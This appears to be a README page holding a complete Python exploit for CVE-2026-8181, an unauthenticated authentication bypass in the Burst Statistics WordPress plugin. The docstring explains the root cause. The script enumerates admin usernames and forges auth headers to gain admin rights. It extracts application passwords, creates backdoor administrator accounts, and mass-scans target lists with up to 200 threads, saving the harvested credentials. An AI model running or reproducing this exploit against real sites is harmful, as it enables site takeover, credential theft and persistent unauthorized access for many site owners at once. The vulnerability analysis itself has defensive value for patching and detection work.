README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2026-8181 - Burst Statistics 3.4.0-3.4.1.1 Authentication Bypass to Admin Account Takeover
Vulnerability: Authentication Bypass in is_mainwp_authenticated() method
Affected: Burst Statistics WordPress Plugin versions 3.4.0 - 3.4.1.1
CVSS: 9.8 (Critical)
Type: Unauthenticated
Root Cause:
In class-mainwp-proxy.php, the is_mainwp_authenticated() method calls
wp_authenticate_application_password(null, $username, $password). On HTTP sites
(where wp_is_application_passwords_available() returns false), this function
returns null instead of WP_Error. The subsequent check `is_wp_error(null)`
evaluates to false, causing the code to fall through and authenticate
based solely on the username via get_user_by('login', $username), without
validating the password.
The has_admin_access() method in trait-admin-helper.php is called during
plugins_loaded (class-burst.php line 118), which fires BEFORE REST API
route processing. This means wp_set_current_user() grants admin privileges
for the ENTIRE request, allowing access to any WordPress REST endpoint.
Attack Flow:
1. Attacker sends request with X-BURSTMAINWP: 1 header and
Authorization: Basic <base64(admin_username:anything)>
2. During plugins_loaded, Burst's has_admin_access() is called
3. is_mainwp_authenticated() bypasses auth (null != WP_Error)
4. wp_set_current_user() switches to admin user
5. Attacker has full WordPress admin privileges for the request
6. Can create new admin users, modify settings, install plugins, etc.
Usage:
python3 CVE-2026-8181.py -u <target_url> [-U <admin_username>] [-o results.txt]
python3 CVE-2026-8181.py -f targets.txt [-j 10] [--output-dir ./out]
python3 CVE-2026-8181.py -f targets.txt -o combined.txt
"""
import argparse
import base64
import json
import os
import random
import string
import sys
import threading
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
_stdout_lock = threading.Lock()
_combined_results_lock = threading.Lock()
def _sync_print(*args, **kwargs):
with _stdout_lock:
print(*args, **kwargs)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
import requests
except ImportError:
print("[!] requests library required: pip3 install requests")
sys.exit(1)
def format_results_text(doc, target_base):
"""Plain-text block for one target (Username / Password / ...)."""
target_base = target_base.rstrip("/")
new_admin = doc.get("new_admin_user")
login_addr = f"{target_base}/wp-admin/"
if isinstance(new_admin, dict) and new_admin.get("username"):
username = new_admin["username"]
password = new_admin["password"]
email = new_admin["email"]
user_id = new_admin["id"]
else:
username = password = email = ""
user_id = ""
if doc.get("success"):
username = doc.get("bypass_username") or ""
bp = doc.get("bypass_payload")
if isinstance(bp, dict):
email = bp.get("email") or ""
_id = bp.get("id")
if _id is not None:
user_id = _id
lines = [
f"Username: {username}",
f"Password: {password}",
f"Email: {email}",
f"User ID: {user_id}",
f"Login Address: {login_addr}",
]
if doc.get("failure_reason"):
lines.append("")
lines.append(f"Note: {doc['failure_reason']}")
elif doc.get("create_user_requested") and not (
isinstance(new_admin, dict) and new_admin.get("username")
):
lines.append("")
lines.append("Note: New admin account was not created.")
return "\n".join(lines) + "\n"
BANNER = """
+----------------------------------------------------------------+
| CVE-2026-8181 - Burst Statistics Auth Bypass PoC |
| Affected: 3.4.0 - 3.4.1.1 | Severity: CRITICAL (9.8) |
| Type: Unauthenticated Admin Account Takeover |
+----------------------------------------------------------------+
"""
def print_creator_credit():
"""Console credit for this PoC build."""
_sync_print("")
_sync_print(" [+] Created: Mürrez ")
_sync_print(' [~] Multi-Thread CVE-2026-8181 Exploit ')
_sync_print("")
class BurstExploit:
def __init__(
self,
target_url,
admin_username="admin",
verify_ssl=False,
timeout=15,
output_path=None,
log_prefix="",
combined_output_path=None,
save_failed_to_disk=True,
):
self.target = target_url.rstrip("/")
self.admin_user = admin_username
self.verify = verify_ssl
self.timeout = timeout
self.output_path = output_path
self.log_prefix = log_prefix or ""
self.combined_output_path = combined_output_path
self.save_failed_to_disk = save_failed_to_disk
self.session = requests.Session()
self.session.verify = verify_ssl
self.session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
})
def log(self, level, msg):
colors = {"info": "\033[94m", "ok": "\033[92m", "warn": "\033[93m", "fail": "\033[91m", "end": "\033[0m"}
prefix = {"info": "[*]", "ok": "[+]", "warn": "[!]", "fail": "[-]"}
line = f"{colors.get(level, '')}{prefix.get(level, '[?]')} {self.log_prefix}{msg}{colors['end']}"
_sync_print(line)
def write_results_file(self, doc):
"""Write plain-text summary to output_path and/or append to combined_output_path."""
success = doc.get("success")
text = format_results_text(doc, self.target)
if self.output_path and (self.save_failed_to_disk or success):
try:
with open(self.output_path, "w", encoding="utf-8") as f:
f.write(text)
self.log("ok", f"Results written to {self.output_path}")
except OSError as e:
self.log("fail", f"Could not write results file: {e}")
if self.combined_output_path and success:
try:
block = f"===== {self.target} =====\n{text}\n"
with _combined_results_lock:
with open(self.combined_output_path, "a", encoding="utf-8") as f:
f.write(block)
except OSError as e:
self.log("fail", f"Could not append combined results file: {e}")
def get_rest_url(self, route):
"""Build REST API URL, trying both pretty permalinks and fallback."""
return f"{self.target}/wp-json{route}"
def get_rest_url_fallback(self, route):
return f"{self.target}/?rest_route={route}"
def rest_request(self, method, route, headers=None, data=None):
"""Make a REST API request, trying pretty permalinks first, then fallback."""
urls = [self.get_rest_url(route), self.get_rest_url_fallback(route)]
for url in urls:
try:
resp = self.session.request(
method, url, headers=headers, json=data,
timeout=self.timeout, allow_redirects=True
)
try:
resp.json()
return resp
except (json.JSONDecodeError, ValueError):
if "rest_route" not in url:
continue
return resp
except requests.RequestException:
continue
return None
def build_bypass_headers(self, username=None):
"""Construct headers that trigger the authentication bypass."""
user = username or self.admin_user
fake_creds = base64.b64encode(f"{user}:bypass_CVE-2026-8181".encode()).decode()
return {
"X-BURSTMAINWP": "1",
"Authorization": f"Basic {fake_creds}",
"Content-Type": "application/json",
}
def check_wordpress(self):
"""Verify the target is running WordPress."""
self.log("info", f"Checking if {self.target} is WordPress...")
try:
resp = self.session.get(self.target, timeout=self.timeout)
indicators = ["wp-content", "wp-includes", "wordpress", "wp-json"]
for ind in indicators:
if ind in resp.text.lower():
self.log("ok", "WordPress detected")
return True
resp2 = self.rest_request("GET", "/wp/v2/")
if resp2 and resp2.status_code == 200:
self.log("ok", "WordPress REST API accessible")
return True
except requests.RequestException:
pass
self.log("warn", "Could not confirm WordPress installation")
return False
def check_burst_statistics(self):
"""Check if Burst Statistics is installed and detect version."""
self.log("info", "Checking for Burst Statistics plugin...")
version = None
try:
resp = self.session.get(
f"{self.target}/wp-content/plugins/burst-statistics/readme.txt",
timeout=self.timeout
)
if resp.status_code == 200 and "burst" in resp.text.lower():
for line in resp.text.split("\n"):
if "stable tag:" in line.lower():
version = line.split(":")[-1].strip()
break
except requests.RequestException:
pass
if not version:
try:
resp = self.session.get(self.target, timeout=self.timeout)
if "burst-statistics" in resp.text:
self.log("ok", "Burst Statistics detected (version unknown)")
return "unknown"
except requests.RequestException:
pass
if version:
self.log("ok", f"Burst Statistics version: {version}")
vuln_versions = ["3.4.0", "3.4.1", "3.4.1.1"]
if version in vuln_versions:
self.log("ok", f"Version {version} is VULNERABLE!")
return version
else:
self.log("warn", f"Version {version} may not be vulnerable (affected: 3.4.0-3.4.1.1)")
return version
else:
self.log("warn", "Burst Statistics not detected")
return None
def enumerate_users(self):
"""Attempt to enumerate WordPress admin usernames."""
self.log("info", "Enumerating admin usernames...")
usernames = []
resp = self.rest_request("GET", "/wp/v2/users")
if resp and resp.status_code == 200:
try:
users = resp.json()
if isinstance(users, list):
for u in users:
slug = u.get("slug", "")
if slug:
usernames.append(slug)
self.log("ok", f"Found user: {slug} (ID: {u.get('id')})")
except (json.JSONDecodeError, ValueError):
pass
if not usernames:
for i in range(1, 6):
try:
resp = self.session.get(
f"{self.target}/?author={i}",
timeout=self.timeout,
allow_redirects=False
)
if resp.status_code in [301, 302]:
location = resp.headers.get("Location", "")
if "/author/" in location:
username = location.rstrip("/").split("/author/")[-1]
usernames.append(username)
self.log("ok", f"Found user via author enum: {username}")
except requests.RequestException:
continue
if not usernames:
usernames = [self.admin_user]
self.log("warn", f"Could not enumerate users, using default: {self.admin_user}")
return usernames
def test_auth_bypass(self, username):
"""Test if the authentication bypass works for a given username."""
self.log("info", f"Testing auth bypass with username: {username}")
headers = self.build_bypass_headers(username)
resp = self.rest_request("GET", "/wp/v2/users/me?context=edit", headers=headers)
if resp and resp.status_code == 200:
try:
data = resp.json()
if "id" in data and data.get("id", 0) > 0:
self.log("ok", f"AUTH BYPASS SUCCESSFUL! Authenticated as: {data.get('name', username)} (ID: {data['id']})")
self.log("ok", f"Email: {data.get('email', 'N/A')}")
roles = data.get("roles", [])
self.log("ok", f"Roles: {', '.join(roles)}")
return data
except (json.JSONDecodeError, ValueError):
pass
resp2 = self.rest_request("POST", "/burst/v1/mainwp-auth", headers=headers, data={})
if resp2 and resp2.status_code == 200:
try:
data = resp2.json()
if "token" in data:
self.log("ok", "AUTH BYPASS SUCCESSFUL via mainwp-auth endpoint!")
self.log("ok", f"Application Password Token obtained: {data['token'][:20]}...")
return {"token": data["token"], "bypass": True}
except (json.JSONDecodeError, ValueError):
pass
if resp:
self.log("fail", f"Auth bypass failed (HTTP {resp.status_code})")
try:
err = resp.json()
self.log("fail", f"Error: {err.get('message', err.get('code', 'unknown'))}")
except (json.JSONDecodeError, ValueError):
pass
else:
self.log("fail", "No response from server")
return None
def create_admin_user(self, username):
"""Create a new WordPress administrator account via the bypass."""
new_user = "burst_" + "".join(random.choices(string.ascii_lowercase, k=6))
new_pass = "".join(random.choices(string.ascii_letters + string.digits + "!@#$%", k=16))
new_email = f"{new_user}@protonmail.com"
self.log("info", f"Creating new admin account: {new_user}")
headers = self.build_bypass_headers(username)
payload = {
"username": new_user,
"password": new_pass,
"email": new_email,
"roles": ["administrator"],
"name": new_user,
}
resp = self.rest_request("POST", "/wp/v2/users", headers=headers, data=payload)
if resp and resp.status_code in [200, 201]:
try:
data = resp.json()
if "id" in data:
self.log("ok", "=" * 50)
self.log("ok", "NEW ADMIN ACCOUNT CREATED SUCCESSFULLY!")
self.log("ok", f" Username: {new_user}")
self.log("ok", f" Password: {new_pass}")
self.log("ok", f" Email: {new_email}")
self.log("ok", f" User ID: {data['id']}")
self.log("ok", f" Login: {self.target}/wp-admin/")
self.log("ok", "=" * 50)
return {"username": new_user, "password": new_pass, "email": new_email, "id": data["id"]}
except (json.JSONDecodeError, ValueError):
pass
if resp:
self.log("fail", f"Failed to create admin user (HTTP {resp.status_code})")
try:
err = resp.json()
self.log("fail", f"Error: {err.get('message', 'unknown')}")
except (json.JSONDecodeError, ValueError):
if "Protected" in resp.text or "<html" in resp.text.lower():
self.log("fail", "WAF/proxy blocking REST API requests")
else:
self.log("fail", "No response from server")
return None
def get_app_password(self, username):
"""Obtain Application Password via mainwp-auth endpoint."""
self.log("info", "Attempting to obtain Application Password via mainwp-auth...")
headers = self.build_bypass_headers(username)
resp = self.rest_request("POST", "/burst/v1/mainwp-auth", headers=headers, data={})
if resp and resp.status_code == 200:
try:
data = resp.json()
if "token" in data:
token = data["token"]
try:
decoded = base64.b64decode(token).decode()
cred_user, cred_pass = decoded.split(":", 1)
self.log("ok", "Application Password obtained!")
self.log("ok", f" Username: {cred_user}")
self.log("ok", f" App Password: {cred_pass}")
self.log("ok", f" Base64 Token: {token}")
return {"username": cred_user, "app_password": cred_pass, "token": token}
except Exception:
self.log("ok", f"Token obtained (raw): {token[:40]}...")
return {"token": token}
except (json.JSONDecodeError, ValueError):
pass
if resp:
self.log("fail", f"mainwp-auth failed (HTTP {resp.status_code})")
return None
def verify_access(self, username):
"""Verify admin access by reading sensitive WordPress data."""
self.log("info", "Verifying admin access level...")
headers = self.build_bypass_headers(username)
checks = [
("GET", "/wp/v2/settings", "WordPress settings"),
("GET", "/wp/v2/plugins", "Installed plugins"),
("GET", "/wp/v2/users?context=edit&roles=administrator", "Admin users"),
]
results = {}
for method, route, desc in checks:
resp = self.rest_request(method, route, headers=headers)
if resp and resp.status_code == 200:
self.log("ok", f"Access confirmed: {desc}")
try:
results[desc] = resp.json()
except (json.JSONDecodeError, ValueError):
results[desc] = True
else:
self.log("warn", f"Could not access: {desc}")
return results
def run(self, create_user=False, show_banner=True):
"""Execute the full exploit chain."""
if show_banner:
_sync_print(BANNER)
print_creator_credit()
doc = {
"cve": "CVE-2026-8181",
"success": False,
"target": self.target,
"wordpress_detected": False,
"burst_statistics_version": None,
"create_user_requested": create_user,
"enumerated_usernames": [],
"bypass_username": None,
"bypass_payload": None,
"verification_routes_ok": [],
"application_password": None,
"new_admin_user": None,
"failure_reason": None,
}
doc["wordpress_detected"] = self.check_wordpress()
version = self.check_burst_statistics()
doc["burst_statistics_version"] = version
if version and version not in ["3.4.0", "3.4.1", "3.4.1.1", "unknown"]:
self.log("warn", f"Target version {version} is outside the known vulnerable range")
self.log("info", "Proceeding with exploit attempt anyway...")
_sync_print()
usernames = self.enumerate_users()
doc["enumerated_usernames"] = usernames
for username in usernames:
_sync_print()
result = self.test_auth_bypass(username)
if result:
doc["success"] = True
doc["bypass_username"] = username
doc["bypass_payload"] = result
_sync_print()
verify_data = self.verify_access(username)
doc["verification_routes_ok"] = list(verify_data.keys()) if verify_data else []
_sync_print()
app_pw = self.get_app_password(username)
doc["application_password"] = app_pw
if create_user:
_sync_print()
new_admin = self.create_admin_user(username)
doc["new_admin_user"] = new_admin
self.write_results_file(doc)
if new_admin:
return new_admin
self.write_results_file(doc)
if app_pw:
return app_pw
return result
_sync_print()
self.log("fail", "Exploit failed - target may not be vulnerable or is protected by WAF")
self.log("info", "Possible reasons:")
self.log("info", " - Plugin version is not in 3.4.0-3.4.1.1 range")
self.log("info", " - Site uses HTTPS (wp_is_application_passwords_available() returns true)")
self.log("info", " - WAF/reverse proxy blocking REST API")
self.log("info", " - Admin username is incorrect")
doc["failure_reason"] = (
"Exploit failed - target may not be vulnerable or is protected by WAF"
)
self.write_results_file(doc)
return None
def load_targets(path):
"""Load target URLs from a text file (one per line; # starts a comment)."""
targets = []
with open(path, encoding="utf-8", errors="replace") as f:
for raw in f:
line = raw.strip()
if not line or line.startswith("#"):
continue
if not urlparse(line).scheme:
line = "http://" + line
targets.append(line.rstrip("/"))
return targets
def target_output_basename(url):
"""Filesystem-safe basename derived from URL host (and port if present)."""
p = urlparse(url)
host = p.hostname or "unknown"
if p.port:
host = f"{host}_{p.port}"
safe = "".join(c if (c.isalnum() or c in "-_.") else "_" for c in host)
return safe or "target"
def scan_target_worker(url, args, output_dir, combined_output_path):
"""Run exploit for one URL (used by thread pool)."""
out_path = None
if output_dir:
out_path = os.path.join(output_dir, f"{target_output_basename(url)}.txt")
exploit = BurstExploit(
target_url=url,
admin_username=args.username,
verify_ssl=not args.insecure,
timeout=args.timeout,
output_path=out_path,
combined_output_path=combined_output_path,
save_failed_to_disk=False,
log_prefix=f"[{url}] ",
)
try:
result = exploit.run(create_user=args.create_user, show_banner=False)
return url, bool(result)
except Exception as exc:
_sync_print(f"[-] [{url}] Worker error: {exc}")
return url, False
def run_multi_target(args):
"""Scan many URLs concurrently."""
urls = load_targets(args.targets_file)
if not urls:
print("[!] No targets loaded from file", file=sys.stderr)
sys.exit(1)
threads = max(1, min(args.threads, 200))
_sync_print(BANNER)
print_creator_credit()
_sync_print(f"[*] Multi-target mode: {len(urls)} URL(s), {threads} worker thread(s)")
if args.output_dir:
os.makedirs(args.output_dir, exist_ok=True)
_sync_print(f"[*] Per-target results directory: {args.output_dir}")
if args.output:
try:
with open(args.output, "w", encoding="utf-8") as f:
f.write("# CVE-2026-8181 combined results (successful exploits only)\n\n")
except OSError as exc:
print(f"[!] Could not initialize combined output file: {exc}", file=sys.stderr)
sys.exit(1)
_sync_print(f"[*] Combined results file: {args.output}")
_sync_print()
successes = []
failures = []
with ThreadPoolExecutor(max_workers=threads) as pool:
future_map = {
pool.submit(scan_target_worker, u, args, args.output_dir, args.output): u
for u in urls
}
for fut in as_completed(future_map):
try:
url, ok = fut.result()
if ok:
successes.append(url)
else:
failures.append(url)
except Exception as exc:
u = future_map[fut]
failures.append(u)
_sync_print(f"[-] [{u}] Future error: {exc}")
_sync_print()
_sync_print(f"[+] Completed: {len(successes)} succeeded, {len(failures)} failed")
return len(successes) > 0
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-8181 - Burst Statistics Authentication Bypass PoC",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -u http://target.com
%(prog)s -u http://target.com -U admin --create-user -o result.txt
%(prog)s -f targets.txt -j 20 --output-dir ./results -k
%(prog)s -f targets.txt -j 50 -o all-results.txt --create-user -k
%(prog)s -u https://target.com -U administrator -k
"""
)
tgt = parser.add_mutually_exclusive_group(required=True)
tgt.add_argument("-u", "--url", help="Single target WordPress base URL")
tgt.add_argument(
"-f",
"--targets-file",
metavar="FILE",
help="Multi-target: text file with one URL/host per line (# comments OK)",
)
parser.add_argument("-U", "--username", default="admin", help="Admin username (default: admin)")
parser.add_argument("--create-user", action="store_true", help="Create a new admin account")
parser.add_argument(
"-o",
"--output",
metavar="FILE",
help="Write plain-text results: with -u one file; with -f append all targets into one FILE",
)
parser.add_argument(
"--output-dir",
metavar="DIR",
help="Multi-target (-f): one .txt per host (optional; not with -o)",
)
parser.add_argument(
"-j",
"--threads",
type=int,
default=10,
metavar="N",
help="Multi-target: concurrent workers (default: 10, max: 200)",
)
parser.add_argument("-k", "--insecure", action="store_true", help="Skip SSL verification")
parser.add_argument("-t", "--timeout", type=int, default=15, help="Request timeout in seconds")
args = parser.parse_args()
if args.targets_file:
if args.output and args.output_dir:
parser.error("With -f, use either -o (single combined file) or --output-dir (per host), not both")
ok = run_multi_target(args)
sys.exit(0 if ok else 1)
if args.output_dir:
parser.error("--output-dir is only for multi-target mode (-f)")
exploit = BurstExploit(
target_url=args.url,
admin_username=args.username,
verify_ssl=not args.insecure,
timeout=args.timeout,
output_path=args.output,
)
result = exploit.run(create_user=args.create_user)
sys.exit(0 if result else 1)
if __name__ == "__main__":
main()